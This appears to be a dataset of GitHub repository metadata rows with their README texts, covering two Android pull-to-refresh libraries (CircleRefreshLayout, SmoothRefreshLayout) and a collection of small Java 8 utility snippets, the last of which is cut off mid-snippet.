tuesda/CircleRefreshLayout,master,1782,369,2015-07-20T18:19:49Z,4357,22,a custom pull-to-refresh layout which contains a interesting animation,,"This is a project with custom pull-to-refresh layout which contains a interesting animation. And the animation is inspired by made by Ramotion.
###Demo###
![](gif/circlerefresh.gif)
###Usage###
``` xml
```
Call back when refresh starts and complete:
``` java
mRefreshLayout.setOnRefreshListener(
new CircleRefreshLayout.OnCircleRefreshListener() {
@Override
public void refreshing() {
// do something when refresh starts
}
@Override
public void completeRefresh() {
// do something when refresh complete
}
});
```
when refreshing is done(for example, the image loading completes), you can invoke:
``` java
mRefreshLayout.finishRefreshing();
```
###License###
MIT
"
dkzwm/SmoothRefreshLayout,master,1300,221,2017-05-31T09:27:16Z,194389,3,一款支持上下拉刷新、越界回弹、二级刷新、横向刷新、拉伸回弹、平滑滚动、嵌套滚动的多功能刷新控件,horizontal loadmore nested nestedscroll nestedscrollingchild3 nestedscrollingparent3 overscroll overscroll-decor refresh refreshlayout scale smoothscroll two-level,"# SmoothRefreshLayout
![Methods](https://img.shields.io/badge/Methods%20%7C%20Size-740%20%7C%2084%20KB-e91e63.svg)
[![MinSdk](https://img.shields.io/badge/MinSdk-14-blue.svg)](https://developer.android.com/about/versions/android-4.0.html)
[![License](https://img.shields.io/badge/License-MIT-blue.svg)](https://github.com/dkzwm/SmoothRefreshLayout/blob/master/LICENSE)
## [English](README_EN.md) | 中文
一个高效的Android刷新库,理论上支持所有的视图,比官方的SwipeRefreshLayout更强大且使用方便.
## 特性:
- 理论上支持所有的视图,且可根据具体需求高效适配.
- 支持多点触摸.
- 支持嵌套滑动,完整实现了NestedScrollingChild3,NestedScrollingParent3 接口,玩转CoordinatorLayout.
- 直接继承自ViewGroup,拥有卓越的性能,支持类FameLayout的特性(Gravity、Margin).
- 支持自动刷新、自动上拉加载、到底自动加载更多(不推荐,建议使用Adapter实现,可自定义到底判断逻辑回调实现预加载更多).
- 支持越界回弹,支持基于物理特性的越界回弹效果.
- 支持刷新视图自定样式:STYLE_DEFAULT(默认不改变大小)、STYLE_SCALE(动态改变大小,会在SRL内部测量并布局,所以性能会有损失)、STYLE_PIN(不会改变视图大小,固定在顶部或者底部)、STYLE_FOLLOW_SCALE(先纵向跟随移动并且不改变视图大小,大于视图高度后动态改变视图大小且性能会有损失)、STYLE_FOLLOW_PIN(不会改变视图大小,先纵向跟随移动,大于视图高度后固定)、STYLE_FOLLOW_CENTER(不会改变视图大小,先纵向跟随移动,大于视图高度后让视图保持在移动的距离中心点).
- 支持二级刷新事件(TwoLevelSmoothRefreshLayout),PS:淘宝二楼、京东活动.
- 支持横向刷新(HorizontalSmoothRefreshLayout).
- 支持ListView、GridView、RecyclerView加载更多的同步平滑滚动.
- 支持手势:同步Fling(刷新视图仍可见的情况下,会先回滚隐藏刷新视图,而后向下传递Fling手势).
- 支持作为可拉伸内部视图布局使用(类小米设置页效果).
- 丰富的回调接口和调试信息,可利用现有API实现丰富的效果.
## 引入
添加如下依赖到你的 build.gradle 文件:
```
dependencies {
implementation 'com.github.dkzwm:srl-core:1.7.2.4'
implementation 'com.github.dkzwm:srl-ext-classics:1.7.2.4'
implementation 'com.github.dkzwm:srl-ext-material:1.7.2.4'
implementation 'com.github.dkzwm:srl-ext-dynamic-rebound:1.7.2.4'
implementation 'com.github.dkzwm:srl-ext-horizontal:1.7.2.4'
implementation 'com.github.dkzwm:srl-ext-two-level:1.7.2.4'
implementation 'com.github.dkzwm:srl-ext-util:1.7.2.4'
}
```
## 演示程序
下载 [Demo.apk](https://raw.githubusercontent.com/dkzwm/SmoothRefreshLayout/master/apk/demo.apk)
## 更新日志
#### 老版本升级务必查看
[更新日志](ext/UPDATE.md)
## 快照
![嵌套滑动](snapshot/test_nested_scroll.gif)
![二级刷新](snapshot/test_two_level_refresh.gif)
----
![横向刷新](snapshot/test_horizontal_refresh.gif)
![拉伸收缩效果](snapshot/test_scale_effect.gif)
----
![QQ红包活动](snapshot/test_qq_style.gif)
![浏览器内核下拉展示](snapshot/test_qq_web_browser_style.gif)
## 使用
#### 在Xml中配置
```
```
#### Java代码配置
```
SmoothRefreshLayout refreshLayout = (SmoothRefreshLayout)findViewById(R.id.smoothRefreshLayout);
refreshLayout.setHeaderView(new ClassicHeader(this));
refreshLayout.setOnRefreshListener(new RefreshingListenerAdapter() {
@Override
public void onRefreshing() {
mHandler.postDelayed(new Runnable() {
@Override
public void run() {
refreshLayout.refreshComplete();
}
}, 4000);
}
});
```
#### 自定义刷新视图
##### 接口定义
```
public interface IRefreshView {
byte TYPE_HEADER = 0;
byte TYPE_FOOTER = 1;
byte STYLE_DEFAULT = 0;
byte STYLE_SCALE = 1;
byte STYLE_PIN = 2;
byte STYLE_FOLLOW_SCALE = 3;
byte STYLE_FOLLOW_PIN = 4;
byte STYLE_FOLLOW_CENTER = 5;
/**
* 返回是头部视图还是尾部视图;
*/
int getType();
/**
* 一般情况都是View实现本接口,所以返回this;
*/
View getView();
/**
* 获取视图样式,自1.4.8版本后支持6种样式,STYLE_DEFAULT、STYLE_SCALE、STYLE_PIN、STYLE_FOLLOW_SCALE、STYLE_FOLLOW_PIN、STYLE_FOLLOW_CENTER;
*/
int getStyle();
/**
* 获取视图的自定义高度,当视图样式为STYLE_SCALE和STYLE_FOLLOW_SCALE时,必须返回一个确切且大于0的值,使用横向刷新库时,该属性实际应该返回的是视图的宽度;
* 自1.6.1版本开始,如果想要当前视图铺满布局即MATCH_PARENT,那么支持返回ViewGroup.LayoutParams.MATCH_PARENT对应的值即`-1`;
*/
int getCustomHeight();
/**
* 手指离开屏幕;
*/
void onFingerUp(SmoothRefreshLayout layout, T indicator);
/**
* 重置视图;
*/
void onReset(SmoothRefreshLayout layout);
/**
* 重新配置视图,准备刷新;
*/
void onRefreshPrepare(SmoothRefreshLayout layout);
/**
* 开始刷新;
*/
void onRefreshBegin(SmoothRefreshLayout layout, T indicator);
/**
* 刷新完成;
*/
void onRefreshComplete(SmoothRefreshLayout layout,boolean isSuccessful);
/**
* 当头部或者尾部视图发生位置变化;
*/
void onRefreshPositionChanged(SmoothRefreshLayout layout, byte status, T indicator);
/**
* 当头部或者尾部视图仍然处于处理事务中,这时候移动其他刷新视图则会调用该方法;
* 在1.4.6版本新加入;
*/
void onPureScrollPositionChanged(SmoothRefreshLayout layout, byte status, T indicator);
}
```
##### 添加自定义刷新视图
- 全局静态代码构造
```
SmoothRefreshLayout.setDefaultCreator(new IRefreshViewCreator() {
@Override
public IRefreshView createHeader(SmoothRefreshLayout layout) {
ClassicHeader header = new ClassicHeader(layout.getContext());
return header;
}
@Override
public IRefreshView createFooter(SmoothRefreshLayout layout) {
ClassicFooter footer = new ClassicFooter(layout.getContext());
return footer;
}
});
```
- 动态代码添加
```
ClassicHeader header = new ClassicHeader(mRefreshLayout.getContext());
mRefreshLayout.setHeaderView(header);
ClassicFooter footer = new ClassicFooter(mRefreshLayout.getContext());
mRefreshLayout.setFooterView(footer);
```
- 请直接写入Xml文件,SmoothRefreshLayout会根据添加的View是否是实现了IRefreshView接口进行判断
#### 实现类QQ下拉阻尼效果
```
mRefreshLayout.setIndicatorOffsetCalculator(new IIndicator.IOffsetCalculator() {
@Override
public float calculate(@IIndicator.MovingStatus int status, int currentPos, float offset) {
if (status == IIndicator.MOVING_HEADER) {
if (offset < 0) {
//如果希望拖动缩回时类似QQ一样没有阻尼效果,阻尼效果只存在于下拉则可以在此返回offset
//如果希望拖动缩回时类似QQ一样有阻尼效果,那么请注释掉这个判断语句
return offset;
}
return (float) Math.pow(Math.pow(currentPos / 2, 1.28d) + offset, 1 / 1.28d) * 2 - currentPos;
} else if (status == IIndicator.MOVING_FOOTER) {
if (offset > 0) {
//如果希望拖动缩回时类似QQ一样没有阻尼效果,阻尼效果只存在于上拉则可以在此返回offset
//如果希望拖动缩回时类似QQ一样有阻尼效果,那么请注释掉这个判断语句
return offset;
}
return -((float) Math.pow(Math.pow(currentPos / 2, 1.28d) - offset, 1 / 1.28d) * 2 - currentPos);
} else {
if (offset > 0) {
return (float) Math.pow(offset, 1 / 1.28d) * 2;
} else if (offset < 0) {
return -(float) Math.pow(-offset, 1 / 1.28d) * 2;
} else {
return offset;
}
}
}
});
```
#### Xml属性
##### SmoothRefreshLayout 自身配置
|名称|类型|描述|
|:---:|:---:|:---:|
|sr_content|reference|指定内容视图的资源ID|
|sr_resistance|float|移动刷新视图时候的移动阻尼(默认:`1.65f`)|
|sr_resistanceOfFooter|float|移动Footer视图时候的移动阻尼(默认:`1.65f`)|
|sr_resistanceOfHeader|float|移动Header视图时候的移动阻尼(默认:`1.65f`)|
|sr_ratioToRefresh|float|触发刷新时位置占刷新视图的高度比(默认:`1f`)|
|sr_ratioOfHeaderToRefresh|float|触发刷新时位置占Header视图的高度比(默认:`1f`)|
|sr_ratioOfFooterToRefresh|float|触发加载更多时位置占Footer视图的高度比(默认:`1f`)|
|sr_ratioToKeep|float|刷新中保持视图位置占刷新视图的高度比(默认:`1f`),该属性的值必须小于等于触发刷新高度比才会有效果|
|sr_ratioToKeepHeader|float|刷新中保持视图位置占Header视图的高度比(默认:`1f`),该属性的值必须小于等于触发刷新高度比才会有效果|
|sr_ratioToKeepFooter|float|刷新中保持视图位置占Footer视图的高度比(默认:`1f`),该属性的值必须小于等于触发刷新高度比才会有效果|
|sr_maxMoveRatio|float|最大移动距离占刷新视图的高度比(默认:`0f`,表示不会触发)|
|sr_maxMoveRatioOfHeader|float|最大移动距离占Header视图的高度比(默认:`0f`,表示不会触发)|
|sr_maxMoveRatioOfFooter|float|最大移动距离占Footer视图的高度比(默认:`0f`,表示不会触发)|
|sr_closeDuration|integer|指定收缩刷新视图到起始位置的时长(默认:`350`)|
|sr_closeHeaderDuration|integer|指定收缩Header视图到起始位置的时长(默认:`350`)|
|sr_closeFooterDuration|integer|指定收缩Footer视图到起始位置的时长(默认:`350`)|
|sr_backToKeepDuration|integer|设置回滚到保持刷新视图位置的时间(默认:`200`)|
|sr_backToKeepHeaderDuration|integer|设置回滚到保持Header视图位置的时间(默认:`200`)|
|sr_backToKeepFooterDuration|integer|设置回滚到保持Footer视图位置的时间(默认:`200`)|
|sr_enablePinContent|boolean|固定内容视图(默认:`false`)|
|sr_enableKeep|boolean|刷新中保持视图停留在所设置的应该停留的位置(默认:`true`)|
|sr_enablePullToRefresh|boolean|拉动刷新,下拉或者上拉到触发刷新位置即立即触发刷新(默认:`false`)|
|sr_enableOverScroll|boolean|越界回弹(默认:`true`)|
|sr_enableRefresh|boolean|设置是否启用下拉刷新(默认:`ture`)|
|sr_enableLoadMore|boolean|设置是否启用加载更多(默认:`false`)|
|sr_mode|enum|模式设置(默认:`MODE_DEFAULT`为刷新控件模式)|
|sr_stickyHeader|reference|指定黏贴头部的资源ID|
|sr_stickyFooter|reference|指定黏贴尾部的资源ID|
##### TwoLevelSmoothRefreshLayout 自身配置
|名称|类型|描述|
|:---:|:---:|:---:|
|sr_enableTwoLevelRefresh|boolean|设置是否启用二级刷新(默认:`true`)|
|sr_backToKeep2Duration|boolean|设置回滚到保持二级刷新头部处于二级刷新过程中的时长(默认:`500`)|
|sr_closeHeader2Duration|boolean|设置关闭二级刷新头部的时长(默认:`500`)|
##### SmoothRefreshLayout包裹内部其他View支持配置
|名称|类型|描述|
|:---:|:---:|:---:|
|layout_gravity|flag|指定其它被包裹视图的对齐属性(非 targetView、非refreshView)|
#### SmoothRefreshLayout java属性设置方法
|名称|参数|描述|
|:---:|:---:|:---:|
|setHeaderView|IRefreshView|配置头部视图|
|setFooterView|IRefreshView|配置尾部视图|
|setContentView|View|配置内容视图|
|setMode|int|配置当前模式|
|setLayoutManager|LayoutManager|配置自定义布局管理器|
|setDisableWhenAnotherDirectionMove|boolean|内部视图含有其他方向滑动视图时需设置该属性为ture(默认:`false`)|
|setMaxOverScrollDuration|int|设置越界回弹动画最长时间(默认:`350`)|
|setMinOverScrollDuration|int|设置越界回弹动画最短时间(默认:`100`)|
|setResistance|float|移动刷新视图时候的移动阻尼(默认:`1.65f`)|
|setResistanceOfFooter|float|移动Footer视图时候的移动阻尼(默认:`1.65f`)|
|setResistanceOfHeader|float|移动Header视图时候的移动阻尼(默认:`1.65f`)|
|setRatioToRefresh|float|触发刷新时位置占刷新视图的高度比(默认:`1.1f`)|
|setRatioOfHeaderToRefresh|float|触发刷新时位置占Header视图的高度比(默认:`1.1f`)|
|setRatioOfFooterToRefresh|float|触发加载更多时位置占Footer视图的高度比(默认:`1.1f`)|
|setRatioToKeep|float|刷新中保持视图位置占刷新视图的高度比(默认:`1f`),该属性的值必须小于等于触发刷新高度比才会有效果|
|setRatioToKeepHeader|float|刷新中保持视图位置占Header视图的高度比(默认:`1f`),该属性的值必须小于等于触发刷新高度比才会有效果|
|setRatioToKeepFooter|float|刷新中保持视图位置占Footer视图的高度比(默认:`1f`),该属性的值必须小于等于触发刷新高度比才会有效果|
|setMaxMoveRatio|float|最大移动距离占刷新视图的高度比(默认:`0f`,表示不会触发)|
|setMaxMoveRatioOfHeader|float|最大移动距离占Header视图的高度比(默认:`0f`,表示不会触发)|
|setMaxMoveRatioOfFooter|float|最大移动距离占Footer视图的高度比(默认:`0f`,表示不会触发)|
|setDurationToClose|int|指定收缩刷新视图到起始位置的时长(默认:`350`)|
|setDurationToCloseHeader|int|指定收缩Header视图到起始位置的时长(默认:`350`)|
|setDurationToCloseFooter|int|指定收缩Footer视图到起始位置的时长(默认:`350`)|
|setDurationOfBackToKeep|integer|设置回滚到保持刷新视图位置的时间(默认:`200`)|
|setDurationOfBackToKeepHeader|integer|设置回滚到保持Header视图位置的时间(默认:`200`)|
|setDurationOfBackToKeepFooter|integer|设置回滚到保持Footer视图位置的时间(默认:`200`)|
|setEnablePinContentView|boolean|固定内容视图(默认:`false`)|
|setEnablePullToRefresh|boolean|拉动刷新,下拉或者上拉到触发刷新位置即立即触发刷新(默认:`false`)|
|setEnableOverScroll|boolean|越界回弹(默认:`true`)|
|setEnableInterceptEventWhileLoading|boolean|刷新中拦截不响应触摸操作(默认:`false`)|
|setEnableHeaderDrawerStyle|boolean|Header抽屉样式,即Header视图在内容视图下面(默认:`false`)|
|setEnableFooterDrawerStyle|boolean|Footer抽屉样式,即Footer视图在内容视图下面(默认:`false`)|
|setDisablePerformRefresh|boolean|关闭触发Header刷新(默认:`false`)|
|setDisablePerformLoadMore|boolean|关闭触发Footer刷新(默认:`false`)|
|setEnableNoMoreData|boolean|设置Footer没有更多数据,该选项设置`true`时在Frame层等同`setDisablePerformLoadMore`设置为`true`,只是自定义视图可以根据该标志位改变视图样式,`ClassicFooter`默认实现了对该属性的支持(默认:`false`)|
|setEnableNoMoreDataAndNoSpringBack|boolean|设置Footer没有更多数据且不再回弹|
|setDisableRefresh|boolean|禁用Header刷新(默认:`false`)|
|setDisableLoadMore|boolean|禁用Footer刷新(默认:`false`)|
|setEnableKeepRefreshView|boolean|刷新中保持视图停留在所设置的应该停留的位置(默认:`true`)|
|setEnableAutoRefresh|boolean|到顶部自动刷新(默认:`false`)|
|setEnableAutoLoadMore|boolean|到底部自动加载(默认:`false`)|
|setEnablePinRefreshViewWhileLoading|boolean|固定刷新视图在所设置的应该停留的位置,并且不响应移动,即Material样式(默认:`false`),设置开启会同时开启`setEnablePinContentView`和`setEnableKeepRefreshView`2个选项|
|setSpringInterpolator|Interpolator|设置主动弹出时的滚动插值器|
|setSpringBackInterpolator|Interpolator|设置释放时的滚动插值器|
|setEnableCompatSyncScroll|boolean|设置是否开启回滚时的同步滚动(默认:`true`)|
|setDisableLoadMoreWhenContentNotFull|boolean|设置当内容视图未满屏时关闭加载更多|
|setStickyHeaderResId|int|设置黏贴头部视图的资源ID|
|setStickyFooterResId|int|设置黏贴头部视图的资源ID|
|setEnableOldTouchHandling|boolean|设置启用老版本的触摸事件处理逻辑|
|setScrollTargetView|View|设置判断是否滚到到边界对应的视图,例如在SmoothRefreshLayout中有一个CoordinatorLayout,CoordinatorLayout中有AppbarLayout、RecyclerView等,加载更多时希望被移动的视图为RecyclerView而不是CoordinatorLayout,那么设置RecyclerView为TargetView即可|
#### SmoothRefreshLayout 回调
|名称|参数|描述|
|:---:|:---:|:---:|
|setOnRefreshListener|T extends OnRefreshListener|设置刷新事件监听回调|
|addLifecycleObserver|ILifecycleObserver|添加生命周期监听|
|addOnStatusChangedListener|addOnStatusChangedListener|设置内部状态改变回调|
|addOnUIPositionChangedListener|OnUIPositionChangedListener|添加视图位置变化的监听回调|
|setOnSyncScrollCallback|OnSyncScrollCallback|设置完成刷新后进行平滑滚动的回调|
|setOnPerformAutoLoadMoreCallBack|OnPerformAutoLoadMoreCallBack|设置触发自动加载更多的条件回调,如果回调的`canAutoLoadMore()`方法返回`true`则会立即触发加载更多|
|setOnPerformAutoRefreshCallBack|OnPerformAutoRefreshCallBack|设置触发自动刷新的条件回调,如果回调的`canAutoRefresh()`方法返回`true`则会立即触发刷新|
|setOnHeaderEdgeDetectCallBack|OnHeaderEdgeDetectCallBack|设置检查内容视图是否在顶部的重载回调(SmoothRefreshLayout内部`isNotYetInEdgeCannotMoveHeader()`方法)|
|setOnFooterEdgeDetectCallBack|OnFooterEdgeDetectCallBack|设置检查内容视图是否在底部的重载回调(SmoothRefreshLayout内部`isNotYetInEdgeCannotMoveFooter()`方法)|
|setOnHookHeaderRefreshCompleteCallback|OnHookUIRefreshCompleteCallBack|设置Header刷新完成的Hook回调,可实现延迟完成刷新|
|setOnHookFooterRefreshCompleteCallback|OnHookUIRefreshCompleteCallBack|设置Footer刷新完成的Hook回调,可实现延迟完成刷新|
#### SmoothRefreshLayout 其它
|名称|参数|描述|
|:---:|:---:|:---:|
|setDefaultCreator(静态方法)|IRefreshViewCreator|设置刷新视图创建者,如果没有特殊指定刷新视图且设置的模式需要刷新视图则会调用创建者构建刷新视图|
|refreshComplete|无参|刷新完成,且设置最后一次刷新状态为成功|
|refreshComplete|boolean|刷新完成,参数:设置最后一次刷新是否刷新成功|
|refreshComplete|boolean,long|刷新完成,参数1:设置最后一次刷新是否刷新成功,参数2:设置延迟重置刷新状态的时间(会先触发刷新视图的刷新完成回调,但在延迟的时间内库实际上状态仍是刷新状态)|
|refreshComplete|long|刷新完成,且设置最后一次刷新状态为成功,参数:设置延迟重置刷新状态的时间(会先触发刷新视图的刷新完成回调,但在延迟的时间内库实际上状态仍是刷新状态)|
|setLoadingMinTime|long|设置开始刷新到结束刷新的最小时间差(默认:`500`),参数:时间差|
|autoRefresh|无参|自动触发Header刷新,立即触发刷新事件并滚动到触发Header刷新位置|
|autoRefresh|boolean|自动触发Header刷新,参数:是否立即触发刷新事件,会滚动到触发Header刷新位置|
|autoRefresh|boolean,boolean|自动触发Header刷新,参数1:是否立即触发刷新事件,参数2:是否滚动到触发Header刷新位置|
|forceRefresh|无参|强制触发Footer刷新,该方法不会触发滚动|
|autoLoadMore|无参|自动触发Footer刷新,立即触发刷新事件并滚动到触发Footer刷新位置|
|autoLoadMore|boolean|自动触发Footer刷新,参数:是否立即触发刷新事件,会滚动到触发Footer刷新位置|
|autoLoadMore|boolean,boolean|自动触发Footer刷新,参数1:是否立即触发刷新事件,参数2:是否滚动到触发Footer刷新位置|
|forceLoadMore|无参|强制触发Footer刷新,该方法不会触发滚动|
#### TwoLevelSmoothRefreshLayout java属性设置方法
|名称|参数|描述|
|:---:|:---:|:---:|
|setRatioOfHeaderToHintTwoLevel|float|设置触发二级刷新提示时的位置占Header视图的高度比|
|setRatioOfHeaderToTwoLevel|float|设置触发二级刷新时的位置占Header视图的高度比|
|setRatioToKeepTwoLevelHeader|float|二级刷新中保持视图位置占Header视图的高度比(默认:`1f`)|
|setDisableTwoLevelRefresh|boolean|设置是否关闭二级刷新(默认:`false`)|
|setDurationOfBackToKeepTwoLevel|int|设置回滚到保持二级刷新Header视图位置的时间(默认:`500`)|
|setDurationToCloseTwoLevel|int|设置二级刷新Header刷新完成回滚到起始位置的时间(默认:`500`)|
#### TwoLevelSmoothRefreshLayout 其它
|名称|参数|描述|
|:---:|:---:|:---:|
|autoTwoLevelRefreshHint|无参|自动触发二级刷新提示并滚动到触发提示位置后回滚回起始位置|
|autoTwoLevelRefreshHint|int|自动触发二级刷新提示并滚动到触发提示位置后停留指定时长,参数:停留多长时间|
|autoTwoLevelRefreshHint|boolean|自动触发二级刷新提示是否滚动到触发提示位置后回滚回起始位置,参数:是否滚到到触发位置|
|autoTwoLevelRefreshHint|boolean,int|自动触发二级刷新提示,参数1:是否滚动到触发位置,参数2:停留多长时间|
|autoTwoLevelRefreshHint|boolean,int,boolean|自动触发二级刷新提示,参数1:是否滚动到触发位置,参数2:停留多长时间,参数3:是否可以被触摸打断,即触发提示动作过程中拦截触摸事件,直到回滚到起始位置并重置为默认状态|
## Thanks
- [liaohuqiu android-Ultra-Pull-To-Refresh](https://github.com/liaohuqiu/android-Ultra-Pull-To-Refresh)
- [pnikosis material-progress](https://github.com/pnikosis/materialish-progress)
## License
MIT License
Copyright (c) 2017 dkzwm
Copyright (c) 2015 liaohuqiu.net
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the ""Software""), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"
shekhargulati/30-seconds-of-java,master,1018,143,2017-12-22T11:09:40Z,159,0,Curated collection of useful little Java functions that you can understand quickly,awesome awesome-list java learn-to-code snippets snippets-collection,"# 30 Seconds Of Java [![Build Status](https://travis-ci.org/shekhargulati/little-java-functions.svg?branch=master)](https://travis-ci.org/shekhargulati/little-java-functions)
> Curated collection of useful little Java 8 functions that you can understand quickly.
## Table of Contents
### Array
View contents
* [`chunk`](#chunk)
* [`countOccurrences`](#countoccurrences)
* [`deepFlatten`](#deepflatten)
* [`difference`](#difference)
* [`differenceWith`](#differencewith)
* [`distinctValuesOfArray`](#distinctvaluesofarray)
* [`dropElements`](#dropelements)
* [`dropRight`](#dropright)
* [`everyNth`](#everynth)
* [`filterNonUnique`](#filternonunique)
* [`flatten`](#flatten)
* [`flattenDepth`](#flattendepth)
* [`groupBy`](#groupby)
* [`head`](#head)
* [`initial`](#initial)
* [`initializeArrayWithRange`](#initializearraywithrange)
* [`initializeArrayWithValues`](#initializearraywithvalues)
* [`intersection`](#intersection)
* [`isSorted`](#issorted)
* [`join`](#join)
* [`nthElement`](#nthelement)
* [`pick`](#pick)
* [`reducedFilter`](#reducedfilter)
* [`remove`](#remove)
* [`sample`](#sample)
* [`sampleSize`](#samplesize)
* [`shuffle`](#shuffle)
* [`similarity`](#similarity)
* [`sortedIndex`](#sortedindex)
* [`symmetricDifference`](#symmetricdifference)
* [`tail`](#tail)
* [`take`](#take)
* [`takeRight`](#takeright)
* [`union`](#union)
* [`without`](#without)
* [`zip`](#zip)
* [`zipObject`](#zipobject)
### Math
View contents
* [`average`](#average)
* [`gcd`](#gcd)
* [`lcm`](#lcm)
* [`findNextPositivePowerOfTwo`](#findnextpositivepoweroftwo)
* [`isEven`](#iseven)
* [`isPowerOfTwo`](#ispoweroftwo)
* [`generateRandomInt`](#generaterandomint)
### String
View contents
* [`anagrams`](#anagrams)
* [`byteSize`](#bytesize)
* [`capitalize`](#capitalize)
* [`capitalizeEveryWord`](#capitalizeeveryword)
* [`countVowels`](#countvowels)
* [`escapeRegExp`](#escaperegexp)
* [`fromCamelCase`](#fromcamelcase)
* [`isAbsoluteURL`](#isabsoluteurl)
* [`isLowerCase`](#islowercase)
* [`isUpperCase`](#isuppercase)
* [`isPalindrome`](#ispalindrome)
* [`isNumeric`](#isnumeric)
* [`mask`](#mask)
* [`reverseString`](#reversestring)
* [`sortCharactersInString`](#sortcharactersinstring)
* [`splitLines`](#splitlines)
* [`toCamelCase`](#tocamelcase)
* [`toKebabCase`](#tokebabcase)
* [`match`](#match)
* [`toSnakeCase`](#tosnakecase)
* [`truncateString`](#truncatestring)
* [`words`](#words)
* [`stringToIntegers`](#stringtointegers)
### IO
View contents
* [`convertInputStreamToString`](#convertinputstreamtostring)
* [`readFileAsString`](#readfileasstring)
* [`getCurrentWorkingDirectoryPath`](#getcurrentworkingdirectorypath)
* [`tmpDirName`](#tmpdirname)
### Exception
View contents
* [`stackTraceAsString`](#stacktraceasstring)
### System
View contents
- [`osName`](#osname)
- [`isDebuggerEnabled`](#isdebuggerenabled)
### Class
View contents
- [`getAllInterfaces`](#getallinterfaces)
- [`IsInnerClass`](#isinnerclass)
### Enum
View contents
- [`getEnumMap`](#getenummap)
## Array
### chunk
Chunks an array into smaller arrays of specified size.
```java
public static int[][] chunk(int[] numbers, int size) {
return IntStream.iterate(0, i -> i + size)
.limit((long) Math.ceil((double) numbers.length / size))
.mapToObj(cur -> Arrays.copyOfRange(numbers, cur, cur + size > numbers.length ? numbers.length : cur + size))
.toArray(int[][]::new);
}
```
### concat
```java
public static T[] concat(T[] first, T[] second) {
return Stream.concat(
Stream.of(first),
Stream.of(second)
).toArray(i -> (T[]) Arrays.copyOf(new Object[0], i, first.getClass()));
}
```
### countOccurrences
Counts the occurrences of a value in an array.
Use Arrays.stream().filter().count() to count total number of values that equals the specified value.
```java
public static long countOccurrences(int[] numbers, int value) {
return Arrays.stream(numbers)
.filter(number -> number == value)
.count();
}
```
### deepFlatten
Deep flattens an array.
Use recursion. Use Arrays.stream().flatMapToInt()
```java
public static int[] deepFlatten(Object[] input) {
return Arrays.stream(input)
.flatMapToInt(o -> {
if (o instanceof Object[]) {
return Arrays.stream(deepFlatten((Object[]) o));
}
return IntStream.of((Integer) o);
}).toArray();
}
```
### difference
Returns the difference between two arrays.
Create a Set from b, then use Arrays.stream().filter() on a to only keep values not contained in b.
```java
public static int[] difference(int[] first, int[] second) {
Set set = Arrays.stream(second).boxed().collect(Collectors.toSet());
return Arrays.stream(first)
.filter(v -> !set.contains(v))
.toArray();
}
```
### differenceWith
Filters out all values from an array for which the comparator function does not return true.
The comparator for int is implemented using IntBinaryOperator function.
Uses Arrays.stream().filter and Arrays.stream().noneMatch() to find the appropriate values.
```java
public static int[] differenceWith(int[] first, int[] second, IntBinaryOperator comparator) {
return Arrays.stream(first)
.filter(a ->
Arrays.stream(second)
.noneMatch(b -> comparator.applyAsInt(a, b) == 0)
).toArray();
}
```
### distinctValuesOfArray
Returns all the distinct values of an array.
Uses Arrays.stream().distinct() to discard all duplicated values.
```java
public static int[] distinctValuesOfArray(int[] elements) {
return Arrays.stream(elements).distinct().toArray();
}
```
### dropElements
Removes elements in an array until the passed function returns true. Returns the remaining elements in the array.
Loop through the array, using Arrays.copyOfRange() to drop the first element of the array until the returned value from the function is true. Returns the remaining elements.
```java
public static int[] dropElements(int[] elements, IntPredicate condition) {
while (elements.length > 0 && !condition.test(elements[0])) {
elements = Arrays.copyOfRange(elements, 1, elements.length);
}
return elements;
}
```
### dropRight
Returns a new array with n elements removed from the right.
Check if n is shorter than the given array and use Array.copyOfRange() to slice it accordingly or return an empty array.
```java
public static int[] dropRight(int[] elements, int n) {
if (n < 0) {
throw new IllegalArgumentException(""n is less than 0"");
}
return n < elements.length
? Arrays.copyOfRange(elements, 0, elements.length - n)
: new int[0];
}
```
### everyNth
Returns every nth element in an array.
Use IntStream.range().filter() to create a new array that contains every nth element of a given array.
```java
public static int[] everyNth(int[] elements, int nth) {
return IntStream.range(0, elements.length)
.filter(i -> i % nth == nth - 1)
.map(i -> elements[i])
.toArray();
}
```
### indexOf
Find index of element in the array. Return -1 in case element does not exist.
Uses IntStream.range().filter() to find index of the element in the array.
```java
public static int indexOf(int[] elements, int el) {
return IntStream.range(0, elements.length)
.filter(idx -> elements[idx] == el)
.findFirst()
.orElse(-1);
}
```
### lastIndexOf
Find last index of element in the array. Return -1 in case element does not exist.
Uses IntStream.iterate().limit().filter() to find index of the element in the array.
```java
public static int lastIndexOf(int[] elements, int el) {
return IntStream.iterate(elements.length - 1, i -> i - 1)
.limit(elements.length)
.filter(idx -> elements[idx] == el)
.findFirst()
.orElse(-1);
}
```
### filterNonUnique
Filters out the non-unique values in an array.
Use Arrays.stream().filter() for an array containing only the unique values.
```java
public static int[] filterNonUnique(int[] elements) {
return Arrays.stream(elements)
.filter(el -> indexOf(elements, el) == lastIndexOf(elements, el))
.toArray();
}
```
### flatten
Flattens an array.
Use Arrays.stream().flatMapToInt().toArray() to create a new array.
```java
public static int[] flatten(Object[] elements) {
return Arrays.stream(elements)
.flatMapToInt(el -> el instanceof int[]
? Arrays.stream((int[]) el)
: IntStream.of((int) el)
).toArray();
}
```
### flattenDepth
Flattens an array up to the specified depth.
```java
public static Object[] flattenDepth(Object[] elements, int depth) {
if (depth == 0) {
return elements;
}
return Arrays.stream(elements)
.flatMap(el -> el instanceof Object[]
? Arrays.stream(flattenDepth((Object[]) el, depth - 1))
: Arrays.stream(new Object[]{el})
).toArray();
}
```
### groupBy
Groups the elements of an array based on the given function.
Uses Arrays.stream().collect(Collectors.groupingBy()) to group based on the grouping function.
```java
public static Map> groupBy(T[] elements, Function func) {
